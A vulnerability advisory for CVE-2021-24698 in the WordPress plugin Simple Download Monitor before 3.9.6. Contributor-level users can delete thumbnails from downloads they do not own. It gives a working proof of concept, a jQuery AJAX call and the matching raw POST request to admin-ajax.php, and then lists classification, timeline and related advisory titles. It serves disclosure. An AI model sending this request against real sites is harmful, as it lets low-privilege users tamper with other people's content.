Simple Download Monitor < 3.9.6 – Arbitrary Thumbnails Removal | CVE 2021-24698 | Plugin Vulnerabilities

Description

The plugin allows users with a role as low as Contributor to remove thumbnails from downloads they do not own, even if they cannot normally edit the download.

Proof of Concept

jQuery.post(ajaxurl, {
action: "sdm_remove_thumbnail_image",
post_id_del: 613 // not owned by the user
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Connection: close
Cookie: [contrib+ not owning the download to remove the thumbnail from]

action=sdm_remove_thumbnail_image&post_id_del=613

Affects Plugins

simple-download-monitor

Fixed in 3.9.6

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

1fda1356-77d8-4e77-9ee6-8f9ceeb3d380

Timeline

Publicly Published

2021-10-05 (about 4 years ago)

Added

2021-10-05 (about 4 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2021-04-22

Title

Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via Low Privilege User

Published

2024-04-19

Title

VikBooking < 1.6.8 - Broken Access Control

Published

2023-10-16

Title

Awesome Support < 6.1.5 - Insufficient permission check in wpas_edit_reply

Published

2025-03-06

Title

VK Blocks < 1.95.0.3 - Missing Authorization to Sensitive Information Exposure

Published

2021-10-19

Title

Download Plugin < 1.6.1 - Subscriber+ Arbitrary Plugin Activation